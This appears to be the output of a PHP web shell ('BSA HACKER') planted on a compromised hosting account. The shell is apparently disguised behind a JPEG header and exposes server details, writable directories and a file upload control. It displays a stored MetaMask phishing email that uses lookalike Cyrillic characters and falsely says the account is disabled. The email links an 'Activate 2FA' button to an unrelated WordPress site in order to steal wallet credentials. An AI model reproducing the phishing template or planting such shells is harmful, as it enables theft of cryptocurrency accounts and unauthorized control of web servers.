ÿØÿàJFIFHHÿá .
BSA HACKER
Logo of a company Server : Apache
System : Linux nusantara.hosteko.com 4.18.0-553.16.1.lve.el8.x86_64 #1 SMP Tue Aug 13 17:45:03 UTC 2024 x86_64
User : koperas1 ( 1254)
PHP Version : 7.4.33
Disable Function : NONE
Directory :  /home/koperas1/mail/koperasikuwaluyosejati.com/office/.spam/new/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /home/koperas1/mail/koperasikuwaluyosejati.com/office/.spam/new/1709056424.M473399P18580.nusantara.hosteko.com,S=7344,W=7484
Return-Path: <postmaster@64d687b938.nxcli.io>
Delivered-To: office+spam@koperasikuwaluyosejati.com
Received: from nusantara.hosteko.com
	by nusantara.hosteko.com with LMTP
	id ZGJ9G6gh3mWUSAAAwA3YgA
	(envelope-from <postmaster@64d687b938.nxcli.io>)
	for <office+spam@koperasikuwaluyosejati.com>; Wed, 28 Feb 2024 00:53:44 +0700
Return-path: <postmaster@64d687b938.nxcli.io>
Envelope-to: office@koperasikuwaluyosejati.com
Delivery-date: Wed, 28 Feb 2024 00:53:44 +0700
Received: from cloudhost-2752190.nl-west-1.nxcli.net ([185.145.13.84]:55178)
	by nusantara.hosteko.com with esmtps  (TLS1.2) tls TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256
	(Exim 4.96.2)
	(envelope-from <postmaster@64d687b938.nxcli.io>)
	id 1rf1eA-0004bW-1P
	for office@koperasikuwaluyosejati.com;
	Wed, 28 Feb 2024 00:53:44 +0700
Received: (qmail 32439 invoked by uid 10160); 27 Feb 2024 17:52:57 +0000
Date: Tue, 27 Feb 2024 17:52:55 +0000
To: office@koperasikuwaluyosejati.com
From: =?UTF-8?B?TdC1dGFN0LBzaw==?= <metamask78510@2fa.io>
Reply-To: metamask@2fa.io
Message-ID: <a4f73c3da029b33173bb9bebb702220b@2fa.io>
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="1e3f8ced30aa5edc72ff2309f478e8a64"
Content-Transfer-Encoding: 8bit
X-Spam-Status: Yes, score=6.7
X-Spam-Score: 67
X-Spam-Bar: ++++++
X-Spam-Report: Spam detection software, running on the system "nusantara.hosteko.com",
 has identified this incoming email as possible spam.  The original
 message has been attached to this so you can view it or label
 similar future email.  If you have any questions, see
 root\@localhost for details.
 Content preview:  Account Security Notification body { font-family: Arial, sans-serif;
    background-color: #f4f4f4; margin: 0; padding: 0; } .container { max-width:
    600px; margin: 20px auto; padding: 20px; background-color: #ffffff; box-shadow:
    0 0 [...] 
 Content analysis details:   (6.7 points, 5.0 required)
  pts rule name              description
 ---- ---------------------- --------------------------------------------------
  0.0 URIBL_BLOCKED          ADMINISTRATOR NOTICE: The query to URIBL was
                             blocked.  See
                             http://wiki.apache.org/spamassassin/DnsBlocklists#dnsbl-block
                              for more information.
                             [URIs: ctfassets.net]
  0.2 HEADER_FROM_DIFFERENT_DOMAINS From and EnvelopeFrom 2nd level
                             mail domains are different
  1.3 HTML_IMAGE_ONLY_24     BODY: HTML: images with 2000-2400 bytes of
                             words
  0.0 HTML_MESSAGE           BODY: HTML included in message
  2.4 RAZOR2_CF_RANGE_51_100 Razor2 gives confidence level above 50%
                             [cf: 100]
  1.7 RAZOR2_CHECK           Listed in Razor2 (http://razor.sf.net/)
  1.0 KAM_LAZY_DOMAIN_SECURITY Sending domain does not have any
                             anti-forgery methods
  0.0 KAM_DMARC_STATUS       Test Rule for DKIM or SPF Failure with Strict
                             Alignment
 -0.0 T_SCC_BODY_TEXT_LINE   No description available.
  0.0 TVD_PH_BODY_ACCOUNTS_PRE The body matches phrases such as
                             "accounts suspended", "account credited",
                             "account verification"
X-Spam-Flag: YES
Subject:  ***SPAM***  =?UTF-8?Q?=D0=90ccount_S=D0=B5curity_Notific=D0=B0tion?=

This is a multi-part message in MIME format.

--1e3f8ced30aa5edc72ff2309f478e8a64
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit


Account Security Notification


 body { font-family: Arial, sans-serif; background-color: #f4f4f4; margin: 0; padding: 0; } .container { max-width: 600px; margin: 20px auto; padding: 20px; background-color: #ffffff; box-shadow: 0 0 10px rgba(0, 0, 0, 0.1); } img { max-width: 100%; height: auto; } h1 { text-align: center; color: #333333; } p { color: #555555; line-height: 1.5; } .cta-button { display: inline-block; padding: 10px 20px; font-size: 16px; font-weight: bold; text-align: center; text-decoration: none; background-color: #007BFF; color: #ffffff; border-radius: 5px; } 



 

Important Account Security Notification
 
We hope this email finds you well. Our security systems have detected some 
unusual activity on your account, leading us to take action to protect your 
account.
For your safety, your account has been temporarily disabled. To restore 
access and enhance the security of your account, we strongly advise you to 
activate Two-Factor Authentication (2FA) without delay.
Click the button below to activate 2FA:
Activate 
2FA
If you encounter any challenges or have concerns, our dedicated support team 
is ready to assist you.
Your prompt attention to this matter is highly appreciated, as it contributes 
to the continued security of your account.
Best regards,© 2024 MetaMask. All rights reserved.
This email is part of our ongoing commitment to ensuring the utmost security 
for your account. If you did not initiate this action, please contact us 
immediately.


--1e3f8ced30aa5edc72ff2309f478e8a64
Content-Type: text/html; charset=UTF-8
Content-Transfer-Encoding: 8bit

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html lang="en"><head><title>Account Security Notification</title>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<style> body { font-family: Arial, sans-serif; background-color: #f4f4f4; margin: 0; padding: 0; } .container { max-width: 600px; margin: 20px auto; padding: 20px; background-color: #ffffff; box-shadow: 0 0 10px rgba(0, 0, 0, 0.1); } img { max-width: 100%; height: auto; } h1 { text-align: center; color: #333333; } p { color: #555555; line-height: 1.5; } .cta-button { display: inline-block; padding: 10px 20px; font-size: 16px; font-weight: bold; text-align: center; text-decoration: none; background-color: #007BFF; color: #ffffff; border-radius: 5px; } </style>

<meta name="GENERATOR" content="MSHTML 11.00.10570.1001"></head>
<body bgcolor="#f4f4f4">
<div class="container"><img style="HEIGHT: 437px; WIDTH: 613px" alt="Company Logo" src="https://images.ctfassets.net/9sy2a0egs6zh/6TmNs4UTJupa4H8szpleWw/0f8f0cecab28e706fbee1c564346fb92/password-req2.png"> 

<h1>Important Account Security Notification</h1>
<p> </p>
<p>We hope this email finds you well. Our security systems have detected some 
unusual activity on your account, leading us to take action to protect your 
account.</p>
<p>For your safety, your account has been temporarily disabled. To restore 
access and enhance the security of your account, we strongly advise you to 
activate Two-Factor Authentication (2FA) without delay.</p>
<p>Click the button below to activate 2FA:</p>
<p><a class="cta-button" href="https://ramosautomotriz.cl/wp " target="_blank">Activate 
2FA</a></p>
<p>If you encounter any challenges or have concerns, our dedicated support team 
is ready to assist you.</p>
<p>Your prompt attention to this matter is highly appreciated, as it contributes 
to the continued security of your account.</p>
<p>Best regards,<br>© 2024 MetaMask. All rights reserved.</p>
<p>This email is part of our ongoing commitment to ensuring the utmost security 
for your account. If you did not initiate this action, please contact us 
immediately.</p></div></body></html>



--1e3f8ced30aa5edc72ff2309f478e8a64--